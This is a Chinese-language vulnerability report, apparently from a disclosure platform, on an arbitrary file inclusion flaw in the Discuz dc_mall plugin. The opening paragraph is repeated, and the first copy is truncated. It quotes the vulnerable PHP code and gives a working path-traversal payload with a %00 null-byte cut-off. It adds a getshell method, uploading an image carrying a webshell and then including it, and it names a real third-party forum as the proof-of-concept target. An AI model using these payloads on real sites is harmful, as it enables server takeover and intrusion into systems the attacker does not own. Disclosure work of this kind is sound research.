### 简要描述: 设计缺陷 ### 详细说明: #discuz积分商城插件任意文件包含(最新版测试) #插件信息: http://addon.discuz.com/?@dc_mall.plugin 官方安装量3000+ (已经不少了吧) [<img src="https://images.seebug.org/upload/201508/0319354340be9f11eca155416f7a12dd4be5be01.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/0319354340be9f11eca155416f7a12dd4be5be01.png) [<img src="https://images.seebug.org/upload/201508/03193843ff7c8ede2715b4f8f168ef2c7f1630d1.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/03193843ff7c8ede2715b4f8f168ef2c7f1630d1.png) 关键字搜一下: #折腾了半天才搞定成功云平台服务。。终于可以装插件了。。。 #测试环境: PHP 版本为: 5.2.9-2 magic_quotes_gpc = off #先看看代码吧: dc_mall.inc.php(漏洞文件) ``` <?php if(!defined('IN_DISCUZ')) { exit('Access Denied'); } $_lang = lang('plugin/dc_mall'); $action = $_GET['action'] ? $_GET['action'] : 'index'; $version ='Ver 1.1.1'; $cvar = $_G['cache']['plugin']['dc_mall']; $file =...
### 简要描述: 设计缺陷 ### 详细说明: #discuz积分商城插件任意文件包含(最新版测试) #插件信息: http://addon.discuz.com/?@dc_mall.plugin 官方安装量3000+ (已经不少了吧) [<img src="https://images.seebug.org/upload/201508/0319354340be9f11eca155416f7a12dd4be5be01.png" alt="图片1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/0319354340be9f11eca155416f7a12dd4be5be01.png) [<img src="https://images.seebug.org/upload/201508/03193843ff7c8ede2715b4f8f168ef2c7f1630d1.png" alt="图片4.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/03193843ff7c8ede2715b4f8f168ef2c7f1630d1.png) 关键字搜一下: #折腾了半天才搞定成功云平台服务。。终于可以装插件了。。。 #测试环境: PHP 版本为: 5.2.9-2 magic_quotes_gpc = off #先看看代码吧: dc_mall.inc.php(漏洞文件) ``` <?php if(!defined('IN_DISCUZ')) { exit('Access Denied'); } $_lang = lang('plugin/dc_mall'); $action = $_GET['action'] ? $_GET['action'] : 'index'; $version ='Ver 1.1.1'; $cvar = $_G['cache']['plugin']['dc_mall']; $file = DISCUZ_ROOT.'./source/plugin/dc_mall/module/index/'.$action.'.inc.php';//action参数未过滤直接传入$file 后面的用%00截断即可包含任意文件 if (!file_exists($file)||!$cvar['open']) showmessage('undefined_action'); $usercredit = getuserprofile('extcredits'.$cvar['credit']); $mallnav = C::t('#dc_mall#dc_mall_sort')->getdata(); $sortid = dintval($_GET['sortid']); if(empty($mallnav[$sortid]))$sortid=0; @include $file; $croppath = DISCUZ_ROOT.'./source/plugin/dc_mall/data/cron.php'; $cronupdate = @include $croppath; if(TIMESTAMP-$cronupdate['timestamp']>$cvar['autotime']*60){ require_once DISCUZ_ROOT.'./source/plugin/dc_mall/cache/cache_mallinfo.php'; build_cache_plugin_mallinfo(); $configdata = 'return '.var_export(array('timestamp'=>TIMESTAMP), true).";\n\n"; if($fp = @fopen($croppath, 'wb')) { fwrite($fp, "<?php\n//plugin mall temp upgrade check file, DO NOT modify me!\n//Identify: ".md5($configdata)."\n\n$configdata?>"); fclose($fp); } } include template('dc_mall:index/'.$action); ?> ``` #包含测试 [<img src="https://images.seebug.org/upload/201508/031936395bfde0824b37810666dde38f70794f85.png" alt="图片2.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/031936395bfde0824b37810666dde38f70794f85.png) #getshell 怎么shell就不用多说了,前台上传带马图片,在直接用包含就成功 www.xxx.com/plugin.php?action=../../../../../data/attachment/forum/201508/02/153404ryzl4yytgyz4yjrl.jpg%00&id=dc_mall [<img src="https://images.seebug.org/upload/201508/03193700768ff9afe86e04b8f19d23a9ada50c4a.png" alt="图片3.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201508/03193700768ff9afe86e04b8f19d23a9ada50c4a.png) ### 漏洞证明: #http://bbs.medkaoyan.net/plugin.php?action=../../../../../robots.txt%00&id=dc_mall
